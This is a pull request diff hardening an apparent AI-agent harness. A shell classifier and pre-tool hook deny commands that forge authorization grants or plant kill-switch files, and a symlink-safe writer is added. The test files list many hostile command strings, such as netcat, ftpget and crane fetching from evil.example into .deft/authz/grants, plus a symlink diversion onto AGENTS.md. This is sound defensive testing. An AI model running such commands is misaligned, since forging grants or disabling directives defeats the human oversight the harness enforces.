### PR TITLE
fix(authz): deny residual UAT Shell writers and contain slices.jsonl

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -20,6 +20,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Fixed
 
+- **UAT Shell residual after #3336: further write bins plus slices.jsonl leaf diversion (#3354).** Under active UAT, residual bins (`nc`/`netcat`/`7zz`/`msgfmt`/`msgcat`/`lz4`/`lzop`/`unrar`/`rar`/`aunpack`/`atool`/`ftpget`/`tftp`/`sqlite3`/`crane`/`objcopy`) that write into `.deft/authz/**` or plant `.deft-directive-disable` / `.no-deft-directive` classify as settings deny (not unclassifiable allow). Dest flags cover `-o`/`--output`/`--outfile` and 7zz attached `-oDIR`; unknown write-shaped dest flags targeting those paths also fail closed. `slices.jsonl` append routes through `containedWrite` so a leaf symlink cannot divert the write. Ordinary non-authz dests such as `/tmp` stay unclassifiable. Already-denied `ncat`/`7z`/`msguniq` peers stay denied. Closes #3354. Refs #3336, #3288, #3039.
+
 ### Removed
 
 ## [0.103.0] - 2026-08-14

--- a/packages/core/src/authz/classify.test.ts
+++ b/packages/core/src/authz/classify.test.ts
@@ -684,6 +684,95 @@ describe("classifyShellAuthzOps (#2944)", () => {
     expect(classifyShellAuthzOps("msguniq -o /tmp/out messages.po")).toEqual([]);
   });
 
+  it("classifies residual writer plants of authz grants and kill-switch as settings (#3354)", () => {
+    // Finding 1: residual bins → .deft/authz/**
+    for (const cmd of [
+      "nc -o .deft/authz/grants/evil.json evil.example 80",
+      "nc --output .deft/authz/grants/evil.json evil.example 80",
+      "netcat -o .deft/authz/grants/evil.json evil.example 80",
+      "netcat --output .deft/authz/grants/evil.json evil.example 80",
+      "7zz x a.7z -o.deft/authz/grants",
+      "7zz x a.7z -o.deft/authz/grants/evil",
+      "msgfmt -o .deft/authz/grants/evil.json messages.po",
+      "msgfmt --output-file .deft/authz/grants/evil.json messages.po",
+      "msgcat -o .deft/authz/grants/evil.json a.po b.po",
+      "msgcat --output-file .deft/authz/grants/evil.json a.po",
+      "lz4 -o .deft/authz/grants/evil.json a.lz4",
+      "lz4 --output .deft/authz/grants/evil.json a.lz4",
+      "lzop -o .deft/authz/grants/evil.json a.lzo",
+      "lzop --output .deft/authz/grants/evil.json a.lzo",
+      "unrar x archive.rar .deft/authz/grants",
+      "rar x archive.rar .deft/authz/grants",
+      "aunpack -X .deft/authz/grants archive.tar",
+      "aunpack --extract-to .deft/authz/grants archive.tar",
+      "atool -X .deft/authz/grants archive.tar",
+      "ftpget evil.example .deft/authz/grants/evil.json remote.json",
+      "tftp evil.example -c get remote.json .deft/authz/grants/evil.json",
+      "sqlite3 db.sqlite .output .deft/authz/grants/evil.json",
+      "sqlite3 db.sqlite '.output .deft/authz/grants/evil.json'",
+      "sqlite3 db.sqlite .once .deft/authz/grants/evil.json",
+      "aunpack -X.deft/authz/grants archive.tar",
+      "crane pull ghcr.io/evil/g:latest .deft/authz/grants/evil.json",
+      "crane pull -o .deft/authz/grants/evil.json ghcr.io/evil/g:latest",
+      "objcopy src.bin .deft/authz/grants/evil.json",
+      "nc.exe -o .deft/authz/grants/evil.json evil.example 80",
+      "/usr/bin/7zz x a.7z -o.deft/authz/grants",
+    ]) {
+      expect(classifyShellAuthzOps(cmd), cmd).toContain("settings");
+      expect(classifyShellAuthzOps(cmd), cmd).not.toEqual([]);
+    }
+    // Finding 2: same bins → kill-switch basenames (regular-file plant).
+    for (const cmd of [
+      "nc -o .deft-directive-disable evil.example 80",
+      "netcat -o .no-deft-directive evil.example 80",
+      "7zz x a.7z -o.deft-directive-disable",
+      "msgfmt -o .deft-directive-disable messages.po",
+      "msgcat -o .no-deft-directive a.po",
+      "lz4 -o .deft-directive-disable a.lz4",
+      "lzop -o .deft-directive-disable a.lzo",
+      "unrar x archive.rar .deft-directive-disable",
+      "aunpack -X .deft-directive-disable archive.tar",
+      "ftpget evil.example .deft-directive-disable remote.json",
+      "sqlite3 db.sqlite .output .deft-directive-disable",
+      "crane pull ghcr.io/evil/x:latest .no-deft-directive",
+      "objcopy src.bin .deft-directive-disable",
+    ]) {
+      expect(classifyShellAuthzOps(cmd), cmd).toContain("settings");
+      expect(classifyShellAuthzOps(cmd), cmd).not.toEqual([]);
+    }
+    // Already-denied #3336 peers stay settings.
+    expect(classifyShellAuthzOps("ncat -o .deft/authz/grants/evil.json evil.example 80")).toContain(
+      "settings",
+    );
+    expect(classifyShellAuthzOps("7z x a.7z -o.deft/authz/grants")).toContain("settings");
+    expect(classifyShellAuthzOps("msguniq -o .deft/authz/grants/evil.json messages.po")).toContain(
+      "settings",
+    );
+    // Fail-closed: unknown write-shaped bin with dest flag targeting protected paths.
+    expect(classifyShellAuthzOps("weirdbin -o .deft/authz/grants/evil.json")).toContain("settings");
+    expect(classifyShellAuthzOps("unknownwriter --output .deft-directive-disable")).toContain(
+      "settings",
+    );
+    expect(classifyShellAuthzOps("unknownwriter --outfile=.no-deft-directive")).toContain(
+      "settings",
+    );
+    // Ordinary residual-bin destinations stay unclassifiable (no overclassify).
+    expect(classifyShellAuthzOps("nc -o /tmp/out example.com 80")).toEqual([]);
+    expect(classifyShellAuthzOps("netcat -o /tmp/out example.com 80")).toEqual([]);
+    expect(classifyShellAuthzOps("7zz x a.7z -o/tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("msgfmt -o /tmp/out messages.po")).toEqual([]);
+    expect(classifyShellAuthzOps("msgcat -o /tmp/out a.po")).toEqual([]);
+    expect(classifyShellAuthzOps("lz4 -o /tmp/out a.lz4")).toEqual([]);
+    expect(classifyShellAuthzOps("lzop -o /tmp/out a.lzo")).toEqual([]);
+    expect(classifyShellAuthzOps("unrar x archive.rar /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("aunpack -X /tmp/out archive.tar")).toEqual([]);
+    expect(classifyShellAuthzOps("ftpget example.com /tmp/out remote.json")).toEqual([]);
+    expect(classifyShellAuthzOps("sqlite3 db.sqlite .output /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("crane pull ghcr.io/example/g:latest /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("objcopy src.bin /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("weirdbin -o /tmp/out")).toEqual([]);
+  });
+
   it("classifies obfuscated programmatic authz-capable writes as settings (#3186)", () => {
     // Base64/byte path construction — residual after #3110 literal path match.
     expect(

--- a/packages/core/src/authz/classify.test.ts
+++ b/packages/core/src/authz/classify.test.ts
@@ -771,6 +771,12 @@ describe("classifyShellAuthzOps (#2944)", () => {
     expect(classifyShellAuthzOps("crane pull ghcr.io/example/g:latest /tmp/out")).toEqual([]);
     expect(classifyShellAuthzOps("objcopy src.bin /tmp/out")).toEqual([]);
     expect(classifyShellAuthzOps("weirdbin -o /tmp/out")).toEqual([]);
+    // scp `-o` is OpenSSH option, not a file dest (retain bin context; #3354 Greptile P1).
+    expect(
+      classifyShellAuthzOps("scp -o IdentityFile=.deft-directive-disable host:x /tmp/out"),
+    ).toEqual([]);
+    expect(classifyShellAuthzOps("scp -o ProxyCommand=none host:g.json /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("cpio -o > /tmp/a.cpio")).toEqual([]);
   });
 
   it("classifies obfuscated programmatic authz-capable writes as settings (#3186)", () => {

--- a/packages/core/src/authz/classify.ts
+++ b/packages/core/src/authz/classify.ts
@@ -926,11 +926,29 @@ function pathishIsProtectedDest(pathish: string): boolean {
  */
 function genericProtectedDests(tokens: readonly string[]): string[] {
   const dests: string[] = [];
+  // Track the current command bin — scp `-o` is OpenSSH option, cpio `-o` is copy-out.
+  // Skipping only when the current token itself is `scp`/`cpio` missed later `-o` values (#3354).
+  let currentBin = "";
   for (let i = 0; i < tokens.length; i++) {
     const raw = tokens[i] as string;
     const n = normalizeToken(raw);
-    const bare = binBareName(raw);
-    if (bare === "scp" || bare === "cpio") continue;
+    if (isShellSegmentBreak(raw)) {
+      currentBin = "";
+      continue;
+    }
+    if (!n.startsWith("-")) {
+      if (isDownloaderDecoderBin(raw)) {
+        currentBin = binBareName(raw);
+      } else if (
+        currentBin.length === 0 &&
+        !raw.includes("/") &&
+        !raw.includes("\\") &&
+        n.length > 0
+      ) {
+        currentBin = binBareName(raw);
+      }
+    }
+    if (currentBin === "scp" || currentBin === "cpio") continue;
     if (n.includes("=") && (n.startsWith("-") || n.startsWith("--"))) {
       const eq = raw.indexOf("=");
       const flag = normalizeToken(raw.slice(0, eq));

--- a/packages/core/src/authz/classify.ts
+++ b/packages/core/src/authz/classify.ts
@@ -256,11 +256,28 @@ const DOWNLOADER_DECODER_BINS = new Set([
   "dpkg-deb",
   "hg",
   "msguniq",
+  // #3354 residual after #3336: nc/7zz/msgfmt peers + plant writers.
+  "nc",
+  "netcat",
+  "7zz",
+  "msgfmt",
+  "msgcat",
+  "lz4",
+  "lzop",
+  "unrar",
+  "rar",
+  "aunpack",
+  "atool",
+  "ftpget",
+  "tftp",
+  "sqlite3",
+  "crane",
+  "objcopy",
 ]);
 
 /**
  * Archive extractors / alt writers that can plant via pathish operands without
- * shell redirects (#3245 / #3288 / #3311 / #3336). Used for pathish authz/kill scans (prefer deny)
+ * shell redirects (#3245 / #3288 / #3311 / #3336 / #3354). Used for pathish authz/kill scans (prefer deny)
  * and write-shape residual under UAT — not bare curl-class URL fetches.
  */
 const ARCHIVE_ALT_WRITE_BINS = new Set([
@@ -316,10 +333,27 @@ const ARCHIVE_ALT_WRITE_BINS = new Set([
   "dpkg-deb",
   "hg",
   "msguniq",
+  // #3354 residual after #3336.
+  "nc",
+  "netcat",
+  "7zz",
+  "msgfmt",
+  "msgcat",
+  "lz4",
+  "lzop",
+  "unrar",
+  "rar",
+  "aunpack",
+  "atool",
+  "ftpget",
+  "tftp",
+  "sqlite3",
+  "crane",
+  "objcopy",
 ]);
 
 /**
- * Bins whose pathish operands are scanned for authz/kill destinations (#3213 / #3245 / #3288 / #3311 / #3336).
+ * Bins whose pathish operands are scanned for authz/kill destinations (#3213 / #3245 / #3288 / #3311 / #3336 / #3354).
  * Prefer a Set over a long `||` chain so coverage counts one membership check, not N branches.
  */
 const PROTECTED_POSITIONAL_BINS = new Set([
@@ -365,14 +399,36 @@ const PROTECTED_POSITIONAL_BINS = new Set([
   "dpkg-deb",
   "hg",
   "msguniq",
+  // #3354 residual: positional dest writers (nc/7zz/unrar/ftpget/crane/objcopy/sqlite3).
+  "nc",
+  "netcat",
+  "7zz",
+  "msgfmt",
+  "msgcat",
+  "lz4",
+  "lzop",
+  "unrar",
+  "rar",
+  "aunpack",
+  "atool",
+  "ftpget",
+  "tftp",
+  "sqlite3",
+  "crane",
+  "objcopy",
 ]);
 
 /** wget family (directory-prefix dest flags). */
 const WGET_FAMILY_BINS = new Set(["wget", "wget2"]);
 /** aria2 family (dir dest flags). */
 const ARIA2_FAMILY_BINS = new Set(["aria2c", "aria2"]);
-/** 7z family (attached -oDIR only). */
-const SEVEN_Z_FAMILY_BINS = new Set(["7z", "7za", "7zr"]);
+/** 7z family (attached -oDIR only). Includes 7zz (#3354). */
+const SEVEN_Z_FAMILY_BINS = new Set(["7z", "7za", "7zr", "7zz"]);
+/** aunpack / atool extract-to dest flags (#3354). */
+const ATOOL_FAMILY_BINS = new Set(["aunpack", "atool"]);
+const ATOOL_DIR_DEST_FLAGS = new Set(["-x", "--extract-to"]);
+/** sqlite3 meta-commands that plant a file dest (#3354). */
+const SQLITE3_OUTPUT_META = [".output", ".once"] as const;
 /** tar family (chdir -C / --directory). Includes GNU/Schily aliases (#3311). */
 const TAR_FAMILY_BINS = new Set(["tar", "bsdtar", "gtar", "star", "gnutar"]);
 /** xh / httpie family (download-dir dest flags) (#3311). */
@@ -480,6 +536,7 @@ function isDownloaderDestFlag(flag: string, bin: string, rawFlag?: string): bool
   }
   if (UNZIP_DIR_DEST_BINS.has(bin) && UNZIP_DIR_DEST_FLAGS.has(flag)) return true;
   if (XH_FAMILY_BINS.has(bin) && XH_DIR_DEST_FLAGS.has(flag)) return true;
+  if (ATOOL_FAMILY_BINS.has(bin) && ATOOL_DIR_DEST_FLAGS.has(flag)) return true;
   return false;
 }
 /**
@@ -664,6 +721,12 @@ function downloaderDecoderDestinations(tokens: readonly string[]): string[] {
           i++;
           continue;
         }
+        // aunpack / atool attached -XDIR (#3354)
+        if (ATOOL_FAMILY_BINS.has(bin) && n.startsWith("-x") && n.length > 2) {
+          dests.push(pathishToken(raw.slice(2)));
+          i++;
+          continue;
+        }
         // tar attached -CDIR (rare; capital C required)
         if (TAR_FAMILY_BINS.has(bin) && raw.startsWith("-C") && raw.length > 2) {
           dests.push(pathishToken(raw.slice(2)));
@@ -722,6 +785,19 @@ function downloaderDecoderDestinations(tokens: readonly string[]): string[] {
         }
       }
 
+      // sqlite3 `.output` / `.once` dest (separate token or `.output PATH` in one token) (#3354).
+      if (bin === "sqlite3") {
+        const meta = sqlite3MetaDest(raw, tokens[i + 1]);
+        if (meta !== null) {
+          dests.push(meta.dest);
+          if (pathishIsAuthzDir(meta.dest) || pathishMentionsKillSwitch(meta.dest)) {
+            protectedPathish.push(meta.dest);
+          }
+          i += meta.consumedNext ? 2 : 1;
+          continue;
+        }
+      }
+
       // scp / certutil / rclone / archive extractors: pathish operands (quote-aware glued-op cut).
       // Under UAT: any `.deft/authz` / kill-switch pathish is fail-closed settings
       // (read vs write thrash deferred — prefer deny over dest-parser perfection; #3213 / #3245).
@@ -754,6 +830,10 @@ function downloaderDecoderDestinations(tokens: readonly string[]): string[] {
     if (lastPositionalPath !== null && !protectedPathish.includes(lastPositionalPath)) {
       dests.push(lastPositionalPath);
     }
+  }
+  // #3354: fail-closed dest flags on unknown write-shaped bins (not named-peer only).
+  for (const dest of genericProtectedDests(tokens)) {
+    dests.push(dest);
   }
   return dests;
 }
@@ -833,6 +913,75 @@ function hasPolicyAuthorityMutator(tokens: readonly string[]): boolean {
 }
 
 /** True when pathish token names a kill-switch basename (quote-strip resistant). */
+function pathishIsProtectedDest(pathish: string): boolean {
+  return pathishIsAuthzDir(pathish) || pathishMentionsKillSwitch(pathish);
+}
+
+/**
+ * Fail-closed dest harvest for write-shaped Shell under UAT (#3354).
+ * Named-bin parsers above are not the only path: any token that looks like
+ * `-o` / `--output` / `--outfile` / `--output-file` (or attached `-oDIR`)
+ * whose dest is authz/kill-switch is collected even when the bin is unknown.
+ * scp `-o` (OpenSSH option) and cpio `-o` (copy-out) stay excluded.
+ */
+function genericProtectedDests(tokens: readonly string[]): string[] {
+  const dests: string[] = [];
+  for (let i = 0; i < tokens.length; i++) {
+    const raw = tokens[i] as string;
+    const n = normalizeToken(raw);
+    const bare = binBareName(raw);
+    if (bare === "scp" || bare === "cpio") continue;
+    if (n.includes("=") && (n.startsWith("-") || n.startsWith("--"))) {
+      const eq = raw.indexOf("=");
+      const flag = normalizeToken(raw.slice(0, eq));
+      if (DOWNLOADER_FILE_DEST_FLAGS.has(flag)) {
+        const dest = pathishToken(raw.slice(eq + 1));
+        if (pathishIsProtectedDest(dest)) dests.push(dest);
+      }
+      continue;
+    }
+    if (
+      n.startsWith("-") &&
+      !n.startsWith("--") &&
+      n.startsWith("-o") &&
+      !n.startsWith("-out") &&
+      n.length > 2
+    ) {
+      const dest = pathishToken(raw.slice(2));
+      if (pathishIsProtectedDest(dest)) dests.push(dest);
+      continue;
+    }
+    if (DOWNLOADER_FILE_DEST_FLAGS.has(n)) {
+      const next = tokens[i + 1];
+      if (next !== undefined && !String(next).startsWith("-") && !isShellSegmentBreak(next)) {
+        const dest = pathishToken(next);
+        if (pathishIsProtectedDest(dest)) dests.push(dest);
+      }
+    }
+  }
+  return dests;
+}
+
+function sqlite3MetaDest(
+  raw: string,
+  next: string | undefined,
+): { dest: string; consumedNext: boolean } | null {
+  const p = pathishToken(raw);
+  for (const meta of SQLITE3_OUTPUT_META) {
+    if (p === meta) {
+      if (next !== undefined && !String(next).startsWith("-") && !isShellSegmentBreak(next)) {
+        return { dest: pathishToken(next), consumedNext: true };
+      }
+      return null;
+    }
+    if (p.startsWith(`${meta} `) || p.startsWith(`${meta}\t`)) {
+      const dest = p.slice(meta.length).trim();
+      if (dest.length > 0 && dest !== "|") return { dest, consumedNext: false };
+    }
+  }
+  return null;
+}
+
 function pathishMentionsKillSwitch(pathish: string): boolean {
   for (const name of KILL_SWITCH_BASENAMES) {
     if (pathish === name || pathish.endsWith(`/${name}`) || pathish.includes(name)) {

--- a/packages/core/src/authz/incident-regression.test.ts
+++ b/packages/core/src/authz/incident-regression.test.ts
@@ -861,4 +861,94 @@ describe("UAT downloader/decoder residuals fail-closed (#3206)", () => {
       expect(decision.code, command).toBe("shell-op-unclassifiable");
     }
   });
+
+  it("denies residual writer authz plant under UAT (not unclassifiable allow) (#3354)", () => {
+    const seams = uatSeams();
+    for (const command of [
+      "nc -o .deft/authz/grants/evil.json evil.example 80",
+      "netcat -o .deft/authz/grants/evil.json evil.example 80",
+      "7zz x a.7z -o.deft/authz/grants",
+      "msgfmt -o .deft/authz/grants/evil.json messages.po",
+      "msgcat -o .deft/authz/grants/evil.json a.po",
+      "lz4 -o .deft/authz/grants/evil.json a.lz4",
+      "lzop --output .deft/authz/grants/evil.json a.lzo",
+      "unrar x archive.rar .deft/authz/grants",
+      "aunpack -X .deft/authz/grants archive.tar",
+      "ftpget evil.example .deft/authz/grants/evil.json remote.json",
+      "sqlite3 db.sqlite .output .deft/authz/grants/evil.json",
+      "crane pull ghcr.io/evil/g:latest .deft/authz/grants/evil.json",
+      "objcopy src.bin .deft/authz/grants/evil.json",
+      "weirdbin -o .deft/authz/grants/evil.json",
+      // already-denied #3336 peers
+      "ncat -o .deft/authz/grants/evil.json evil.example 80",
+      "7z x a.7z -o.deft/authz/grants",
+      "msguniq -o .deft/authz/grants/evil.json messages.po",
+    ]) {
+      const decision = decideHook(
+        {
+          host: "claude",
+          event: "tool.before",
+          projectRoot: "/project",
+          payload: { tool_name: "Bash", tool_input: { command } },
+        },
+        seams,
+      );
+      expect(decision.verdict, command).toBe("deny");
+      expect(decision.code, command).toMatch(/^authz-/);
+      expect(decision.code, command).not.toBe("shell-op-unclassifiable");
+    }
+  });
+
+  it("denies residual writer kill-switch plant under UAT (#3354)", () => {
+    const seams = uatSeams();
+    for (const command of [
+      "nc -o .deft-directive-disable evil.example 80",
+      "7zz x a.7z -o.deft-directive-disable",
+      "msgfmt -o .no-deft-directive messages.po",
+      "lz4 -o .deft-directive-disable a.lz4",
+      "sqlite3 db.sqlite .output .deft-directive-disable",
+      "objcopy src.bin .no-deft-directive",
+      "unknownwriter --output .deft-directive-disable",
+    ]) {
+      const decision = decideHook(
+        {
+          host: "claude",
+          event: "tool.before",
+          projectRoot: "/project",
+          payload: { tool_name: "Shell", tool_input: { command } },
+        },
+        seams,
+      );
+      expect(decision.verdict, command).toBe("deny");
+      expect(decision.code, command).toMatch(/^authz-/);
+      expect(decision.code, command).not.toBe("shell-op-unclassifiable");
+    }
+  });
+
+  it("still allows ordinary residual-bin dest under UAT (non-authz) (#3354)", () => {
+    const seams = uatSeams();
+    for (const command of [
+      "nc -o /tmp/out example.com 80",
+      "7zz x a.7z -o/tmp/out",
+      "msgfmt -o /tmp/out messages.po",
+      "sqlite3 db.sqlite .output /tmp/out",
+      "objcopy src.bin /tmp/out",
+      "weirdbin -o /tmp/out",
+    ]) {
+      const decision = decideHook(
+        {
+          host: "claude",
+          event: "tool.before",
+          projectRoot: "/project",
+          payload: {
+            tool_name: "Bash",
+            tool_input: { command },
+          },
+        },
+        seams,
+      );
+      expect(decision.verdict, command).toBe("allow");
+      expect(decision.code, command).toBe("shell-op-unclassifiable");
+    }
+  });
 });

--- a/packages/core/src/fs/contained-write.ts
+++ b/packages/core/src/fs/contained-write.ts
@@ -22,6 +22,7 @@ import {
   closeSync,
   constants,
   existsSync,
+  fsyncSync,
   lstatSync,
   mkdirSync,
   openSync,
@@ -226,6 +227,7 @@ function writeNoFollow(targetAbs: string, buf: Buffer, flags: number): number {
       }
       offset += n;
     }
+    fsyncSync(fd);
     return offset;
   } finally {
     closeSync(fd);

--- a/packages/core/src/slice/existing.test.ts
+++ b/packages/core/src/slice/existing.test.ts
@@ -1,4 +1,4 @@
-import { mkdirSync, mkdtempSync, rmSync } from "node:fs";
+import { mkdirSync, mkdtempSync, readFileSync, rmSync, symlinkSync, writeFileSync } from "node:fs";
 import { tmpdir } from "node:os";
 import { join } from "node:path";
 import { afterAll, describe, expect, it } from "vitest";
@@ -227,6 +227,37 @@ describe("runRecordExisting", () => {
     );
     expect(bad.exitCode).toBe(1);
     expect(bad.stderr).toContain("issue #3");
+  });
+
+  it("refuses leaf symlink slices.jsonl diverting append into tracked file (#3354)", () => {
+    const root = makeRoot();
+    const victim = join(root, "AGENTS.md");
+    writeFileSync(victim, "# keep existing\n", "utf8");
+    const logPath = join(root, "xbrief", ".triage-cache", "slices.jsonl");
+    try {
+      symlinkSync(victim, logPath);
+    } catch {
+      return;
+    }
+    const result = runRecordExisting(
+      {
+        umbrella: 1,
+        children: "2",
+        actor: "manual:operator",
+        expectedCloseSignal: "all-children-merged",
+        slicedAt: "2026-05-14T17:00:00Z",
+        notes: null,
+        dryRun: false,
+        force: false,
+        skipValidation: true,
+        repo: "owner/repo",
+        projectRoot: root,
+      },
+      new Map(),
+    );
+    expect(result.exitCode).toBe(1);
+    expect(result.stderr).toMatch(/refused slices\.jsonl write|symlink|contained write/i);
+    expect(readFileSync(victim, "utf8")).toBe("# keep existing\n");
   });
 });
 

--- a/packages/core/src/slice/existing.ts
+++ b/packages/core/src/slice/existing.ts
@@ -1,3 +1,4 @@
+import { ContainedWriteError } from "../fs/contained-write.js";
 import type { CompletedProcess } from "../scm/call.js";
 import { call as scmCall } from "../scm/call.js";
 import { pyRepr } from "../scm/py-format.js";
@@ -369,7 +370,10 @@ export function runRecordExisting(
       if (authoritativeDup !== null && !args.force) {
         return { kind: "duplicate" as const, duplicate: authoritativeDup };
       }
-      const id = writeSliceUnlocked(record, { path: logPath });
+      const id = writeSliceUnlocked(record, {
+        path: logPath,
+        projectRoot: resolved.projectRoot,
+      });
       return { kind: "written" as const, sliceId: id };
     });
     if (outcome.kind === "duplicate") {
@@ -391,6 +395,13 @@ export function runRecordExisting(
   } catch (err) {
     if (err instanceof SliceRecordError) {
       return { exitCode: 1, stdout: "", stderr: `error: invalid record -- ${err.message}\n` };
+    }
+    if (err instanceof ContainedWriteError) {
+      return {
+        exitCode: 1,
+        stdout: "",
+        stderr: `error: refused slices.jsonl write -- ${err.message}\n`,
+      };
     }
     throw err;
   }

--- a/packages/core/src/slice/record.test.ts
+++ b/packages/core/src/slice/record.test.ts
@@ -1,7 +1,8 @@
-import { mkdirSync, mkdtempSync, readFileSync, rmSync, writeFileSync } from "node:fs";
+import { mkdirSync, mkdtempSync, readFileSync, rmSync, symlinkSync, writeFileSync } from "node:fs";
 import { tmpdir } from "node:os";
 import { join } from "node:path";
 import { afterAll, describe, expect, it } from "vitest";
+import { ContainedWriteError } from "../fs/contained-write.js";
 import { SliceRecordError } from "./errors.js";
 import { withAppendLock } from "./lock.js";
 import {
@@ -172,5 +173,56 @@ describe("record module", () => {
     withAppendLock(path, () => order.push(1));
     withAppendLock(path, () => order.push(2));
     expect(order).toEqual([1, 2]);
+  });
+
+  it("writeSliceUnlocked refuses leaf symlink diversion into tracked file (#3354)", () => {
+    const root = mkdtempSync(join(tmpdir(), "deft-slice-symlink-"));
+    temps.push(root);
+    const victim = join(root, "AGENTS.md");
+    writeFileSync(victim, "# keep me\n", "utf8");
+    const cacheDir = join(root, "xbrief", ".triage-cache");
+    mkdirSync(cacheDir, { recursive: true });
+    const logPath = join(cacheDir, "slices.jsonl");
+    try {
+      symlinkSync(victim, logPath);
+    } catch {
+      return;
+    }
+    expect(() =>
+      writeSliceUnlocked(
+        {
+          slice_id: "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+          umbrella: 1,
+          umbrella_url: "u",
+          sliced_at: "2026-05-14T17:00:00Z",
+          actor: "a",
+          children: [child],
+          expected_close_signal: "all-children-merged",
+        },
+        { path: logPath, projectRoot: root },
+      ),
+    ).toThrow(ContainedWriteError);
+    expect(readFileSync(victim, "utf8")).toBe("# keep me\n");
+  });
+
+  it("writeSliceUnlocked refuses out-of-containment dest (#3354)", () => {
+    const root = mkdtempSync(join(tmpdir(), "deft-slice-escape-"));
+    const outside = mkdtempSync(join(tmpdir(), "deft-slice-outside-"));
+    temps.push(root, outside);
+    const outsideLog = join(outside, "slices.jsonl");
+    expect(() =>
+      writeSliceUnlocked(
+        {
+          slice_id: "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+          umbrella: 1,
+          umbrella_url: "u",
+          sliced_at: "2026-05-14T17:00:00Z",
+          actor: "a",
+          children: [child],
+          expected_close_signal: "all-children-merged",
+        },
+        { path: outsideLog, projectRoot: root },
+      ),
+    ).toThrow(ContainedWriteError);
   });
 });

--- a/packages/core/src/slice/record.ts
+++ b/packages/core/src/slice/record.ts
@@ -1,14 +1,7 @@
 import { randomUUID } from "node:crypto";
-import {
-  appendFileSync,
-  closeSync,
-  existsSync,
-  fsyncSync,
-  mkdirSync,
-  openSync,
-  readFileSync,
-} from "node:fs";
+import { existsSync, mkdirSync, readFileSync } from "node:fs";
 import { dirname, resolve } from "node:path";
+import { containedWrite } from "../fs/contained-write.js";
 import { resolveTriageCachePath } from "../triage/cache-path.js";
 import { pythonJsonStringify } from "./json.js";
 import { withAppendLock } from "./lock.js";
@@ -29,10 +22,6 @@ export interface WriteSliceOptions {
 export interface RecordModuleDeps {
   readonly readFile?: typeof readFileSync;
   readonly exists?: typeof existsSync;
-  readonly append?: typeof appendFileSync;
-  readonly fsync?: typeof fsyncSync;
-  readonly open?: typeof openSync;
-  readonly close?: typeof closeSync;
   readonly mkdir?: typeof mkdirSync;
   readonly withLock?: typeof withAppendLock;
 }
@@ -40,13 +29,21 @@ export interface RecordModuleDeps {
 const defaultDeps: Required<RecordModuleDeps> = {
   readFile: readFileSync,
   exists: existsSync,
-  append: appendFileSync,
-  fsync: fsyncSync,
-  open: openSync,
-  close: closeSync,
   mkdir: mkdirSync,
   withLock: withAppendLock,
 };
+
+/**
+ * Containment root for slices.jsonl append (#3354 / #3288).
+ * Prefer `projectRoot` when the log is nested under it so out-of-tree dests refuse.
+ * Otherwise use the log parent (still refuses leaf symlink follow).
+ */
+export function containmentRootForSliceLog(logPath: string, projectRoot?: string): string {
+  if (projectRoot !== undefined) {
+    return resolve(projectRoot);
+  }
+  return resolve(dirname(logPath));
+}
 
 function resolvePath(path: string | undefined): string {
   return path !== undefined ? resolve(path) : resolveTriageCachePath(process.cwd(), "slices.jsonl");
@@ -95,7 +92,12 @@ function parseJsonlIds(
 /** Validate + append record without acquiring the sidecar lock. */
 export function writeSliceUnlocked(
   record: Record<string, unknown>,
-  options: { path?: string; deps?: RecordModuleDeps; warn?: (message: string) => void } = {},
+  options: {
+    path?: string;
+    deps?: RecordModuleDeps;
+    warn?: (message: string) => void;
+    projectRoot?: string;
+  } = {},
 ): string {
   const deps = { ...defaultDeps, ...options.deps };
   validateRecord(record);
@@ -107,13 +109,14 @@ export function writeSliceUnlocked(
     return resolvedId;
   }
   const line = `${pythonJsonStringify(record)}\n`;
-  deps.append(logPath, line, { encoding: "utf8" });
-  const fd = deps.open(logPath, "a");
-  try {
-    deps.fsync(fd);
-  } finally {
-    deps.close(fd);
-  }
+  const root = containmentRootForSliceLog(logPath, options.projectRoot);
+  deps.mkdir(root, { recursive: true });
+  containedWrite({
+    root,
+    target: logPath,
+    data: line,
+    mode: "append",
+  });
   return resolvedId;
 }
 


### PR DESCRIPTION
## Summary

Post-#3336 UAT Shell still allowed residual write-capable binaries as unclassifiable. Those paths can plant forged `.deft/authz` grants or a `.deft-directive-disable` / `.no-deft-directive` kill-switch. Separately, `slices.jsonl` append used a raw writer that followed an in-tree leaf symlink.

This PR classifies the remaining residual bins as **settings deny** when they write into `.deft/authz/**` or plant a kill-switch, including dest flags `-o` / `--output` / `--outfile` and 7zz attached `-oDIR`. Unknown write-shaped dest flags targeting those paths also fail closed (not named-peer allowlists only). Ordinary dests such as `/tmp` stay unclassifiable. `writeSliceUnlocked` / `slice:record-existing` now append through `containedWrite`.

## Related Issues

Closes #3354

## Checklist

- [x] `/deft:change` — N/A: residual security fix under existing active xBRIEF (not a new cross-cutting change proposal)
- [x] `CHANGELOG.md` — `[Unreleased]` security note
- [x] `ROADMAP.md` — N/A
- [x] Tests pass locally (`task check:framework-source`; targeted vitest on authz + slice)

## Post-Merge

- [ ] Verify issue auto-close after squash merge
